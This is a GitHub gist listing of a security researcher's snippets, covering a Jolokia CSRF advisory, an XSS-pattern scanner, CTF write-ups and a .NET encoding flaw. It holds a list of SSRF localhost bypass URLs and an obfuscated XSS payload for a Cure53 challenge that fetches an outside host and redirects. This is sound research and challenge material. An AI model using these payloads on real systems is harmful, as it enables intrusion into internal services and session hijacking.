Skip to content

Instantly share code, notes, and snippets.

Martin Bajanik bayotop

Block or report user

Report or block bayotop

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@bayotop
bayotop / jolokia-1.6.0-csrf.md
Created Jul 3, 2019
CVE-2018-10899: CSRF in Jolokia 1.6.0
View jolokia-1.6.0-csrf.md

Summary

Jolokia 1.6.0 is vulnerable to CSRF. This holds true for properly configured instances with strict checking for origin and referrer headers. The issue was fixed in version 1.6.1.

Red Hat Security Advisory: https://access.redhat.com/security/cve/cve-2018-10899

Details

In version 1.2.1 Jolokia introduced a <strict-checking/> option within the Cross-Origin Resource Sharing policy defined in jolokia-access.xml to prevent CSRF (4.1.5).

@bayotop
bayotop / gauth.py
Last active Jun 27, 2019
Programmatic authentication to GCP's Identiy-Aware Proxy
View gauth.py
# https://cloud.google.com/iap/docs/authentication-howto
import json
import time
from jwt import JWT, jwk_from_pem
import requests
jwt = JWT()
@bayotop
bayotop / hrefs.py
Last active Dec 4, 2018
Identify "href" (i.e., free "javascript:" XSS) and dangerouslySetInnerHtml usages in ReactJS SPAs.
View hrefs.py
import re
import sys
VULNERABLE_HREF = r'href: [^"].+[^\s]?'
DANGEROUSLY_SET_INNER_HTML = r'__html: .+[^\s]?'
STATE_VALUES = r'\.setState\({([\s\S]*?)}\)'
#false_positives = ("this.props.team.", "constants.")
def find_state_candidates(name, states):
@bayotop
bayotop / h1-702-web-ctf.md
Created Jun 20, 2018
h1-702 CTF 2018 - Web 1
View h1-702-web-ctf.md
@bayotop
bayotop / bypasses.txt
Last active Oct 9, 2019
Various useful bypasses
View bypasses.txt
# SSRF localhost (@omespino)
http://127.0.0.1
http://[::]/ # ipv6
http://0/
http://localtest.me # dns to 127.0.0.1
http://2130706433/ # decimal
http://0x7f000001/ # hex
http://0x7f.0x00.0x00.0x01 # hex
http://0177.0.0.01 # octal
@bayotop
bayotop / cure53-2018.md
Last active May 30, 2018
Cure53 - Chinese New Year Challenge 2018
View cure53-2018.md

Works in latest Firefox 58.0.2 (Windows 10, 64-bit) (copy-paste into browser to preserve URL encoding):

https://henhouse.cure53.berlin?value=<svg onload="document.cookie=`user=onerror%253dalert%253bthrow document.scripts[0].attributes[0].value%252f%252f;domain=.cure53.berlin`;fetch(atob(`aHR0cHM6Ly9iYWphbmlrLmNvbQ==`)).then(r=>r.text()).then(function(t){location=atob(atob(`YUhSMGNITTZMeTluYjJ4a1pXNWxaMmN1WTNWeVpUVXpMbUpsY214cGJpOC9lSE56UFR4NElHbGtQVmR2ZHlBdlBqeHpZM0pwY0hRZ2FXUTlkMlZzWTI5dFpVMXpaejQ4TDNOamNtbHdkRDRtZEc5clpXNDk=`))%2bt})">&key=.element.innerHTML

When pasting into submit.cure53.berlin, the above has to be URL decoded once:

https://henhouse.cure53.berlin?value=<svg onload="document.cookie=`user=onerror%3dalert%3bthrow document.scripts[0].attributes[0].value%2f%2f;domain=.cure53.berlin`;fetch(atob(`aHR0cHM6Ly9iYWphbmlrLmNvbQ==`)).then(r=>r.text()).then(function(t){location=atob(atob(`YUhSMGNITTZMeTluYjJ4a1pXNWxaMmN1WTNWeVpUVXpMbUpsY214cGJpOC9lSE56UFR4NElHbGtQVmR2ZHlBdlBqeHpZM0pwY0hR
@bayotop
bayotop / keybase.md
Created Jan 15, 2018
Keybase.io GH Verification
View keybase.md

Keybase proof

I hereby claim:

  • I am bayotop on github.
  • I am bayotop (https://keybase.io/bayotop) on keybase.
  • I have a public key whose fingerprint is 38D3 3EC0 5654 05BC 3C76 686F C090 53E7 6BFB A3FD

To claim this, I am signing this object:

@bayotop
bayotop / last-evet-id.md
Last active May 25, 2019
Sending arbitrary Last-Event-ID header values across origins using the EventSource API.
View last-evet-id.md

The EventSource API

The EventSource interface is used to receive server-sent events. It connects to a server over HTTP and receives events in text/event-stream format without closing the connection.

https://developer.mozilla.org/en-US/docs/Web/API/EventSource

Last-Event-ID

Setting an ID lets the browser keep track of the last event fired so that if, the connection to the server is dropped, a special HTTP header (Last-Event-ID) is set with the new request.

View h1_212_writeup.md

Description

https://www.hackerone.com/blog/hack-your-way-to-nyc-this-december-for-h1-212

How I found the flag

I ran an obligatory port scan, checked the IP using shodan.io, and did some basic directory discovery. I found two open ports - 22 and 80 - and one directory /flag with a message from the creators.

As this wasn't really helpful, I tried to enumerate vhosts and found one resulting in a different response: admin.acme.org.

@bayotop
bayotop / utf8_fallback.cs
Created Aug 22, 2017
Unsafe default behavior of Encoding.UTF8.GetBytes()
View utf8_fallback.cs
string secret = "\ud8ab";
string secret2 = "\ud8cd";
if (!secret.Equals(secret2))
{
Console.Out.WriteLine("The strings are not equal.");
}
computeSignature(secret, "timestamp", "payload"); // returns 1eba7aac5f10ee7aa985722256aa4125e8e59fe256386c8ab10295063d986e57
computeSignature(secret2, "timestamp", "payload"); // returns 1eba7aac5f10ee7aa985722256aa4125e8e59fe256386c8ab10295063d986e57
You can’t perform that action at this time.